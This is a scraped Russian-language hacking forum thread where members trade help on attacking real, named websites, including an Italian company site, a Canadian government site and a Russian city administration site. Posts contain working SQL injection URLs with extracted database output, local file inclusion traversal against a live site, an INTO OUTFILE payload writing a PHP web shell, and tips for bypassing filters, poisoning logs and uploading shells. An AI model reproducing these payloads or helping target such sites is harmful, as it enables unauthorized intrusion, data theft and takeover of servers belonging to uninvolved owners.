Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+

    5.0.77-log:cms_it_db_01:cms_it_dba@localhost:redhat-linux-gnu
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Какая здесь ветка, кто-нибудь может ответить?

     
  3. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    на этом сайте нашол пару xss _http://shock-world.com/
    в полях регистрации email и name но они до ужаса бесполезные.
    есть кто поможет дальше прокрутить ? потому что я пока ничего ненашол , но уверен есть там дырки
     
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    3

    Ваше сообщение слишком короткое. Оно должно быть не менее 4 символов.
     
    1 person likes this.
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Тогда ищи их, а с вопросами - сюда.
    За тебя никто ничего делать не будет.
     
  6. [stranger]

    [stranger] Member

    Joined:
    2 Feb 2010
    Messages:
    167
    Likes Received:
    29
    Reputations:
    4
    есть сайт с LFI, при чтении /proc/self/environ получается вот что:
    /proc/self/cmdline
    link: http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/cmdline%00

    WTF?oO
     
    #16986 [stranger], 8 Jun 2011
    Last edited: 8 Jun 2011
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    [stranger], ссылка?
     
  8. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Есть xss, выполнить можно только
    Ну или просто
    Символы как:
    Фильтруются.

    Пробовал по разному, и так:
    И просто даже все брал в String.fromCharCode.
    Но все безуспешно. Помогите плиз, правильно составить запрос.
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    WTF?oO , файлы находящиеся за корнем отличаются от кодировки файлов находящимся в каталоге сайта т е файлы читаются в кодировке, отличной от их изначальной кодировки. Надо искать что то в пределах сайта/на другом сайте, если есть доступ:
    Code:
    http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../robots.txt%00ddd
    Так же можно найти путь к логам, и послать в них данные в кодировке, в которой они читаются и выводятся.
     
  10. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Проблема только с чтением данных, которые могут быть изменены клиентом.
    Code:
    http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/status%00ddd
    Проще в хостинге зарегаться и посмотреть где логи лежат.
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    M1lten, что именно не получается?
    eval(String.fromCharCode(тут любой нужный JS-код))
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Помогите разобраться вот с этой скулёй.

    Code:
    http://www.biogov.gc.ca/english/LinkSearch.asp?x=732&formAction=keywordsearch&txtSearchKeywords=13\
    Мож есть статья как крутить при алертах
     
    _________________________
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+order+by+15
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Пробовал. Вывода не нашёл.

    Также пробовал через подзапрос

    Code:
    http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+and+1=1+union+select+1
    Так же болт.
     
    _________________________
  15. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    Бразы, кто в курсе нет каким макаром залить шелл через cnstats
     
  16. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    какая версия?
     
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Фильтруется кавычка, как здесь это обойти. В интернете искал, но по этому вопросу ничего не нашел.

    http://www.cityadm.magadan.ru/index.php?cstart=4'+order+by+1+--+&do=cat&category=kotirovka
     
  18. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    ?id=-512+UnIoN+AlL+sElEcT+1,2,'<?system($_GET[cmd]);?>',4,5,6,7,8+INTO+OUTFILE+'/web3/vhosts/webhosting/news/php.php'--
    выдает Bad Request
    что можно сделать?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    сервер ругается, вероятнее на слово $_GET или систем, подставь разные слова/функции смотри что конкретно фильтрует
    пробуй eval($_REQUEST['a']), ну или как то так, в основном именно они не попадают под фильтр
    ---
    да и вообще нах юзать system?
     
    _________________________
    1 person likes this.
  20. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    Konqi спасибо, я так понял можно записать любой код, буду пробовать.
    Вот ещё проблема
    http://www.trommeslageren.dk/index2.php?id='0
    ни могу подобрать поля
    http://www.trommeslageren.dk/index2.php?id=-10+union+select+null,null..
    ни чего не меняется
    что тогда делать?
     
Thread Status:
Not open for further replies.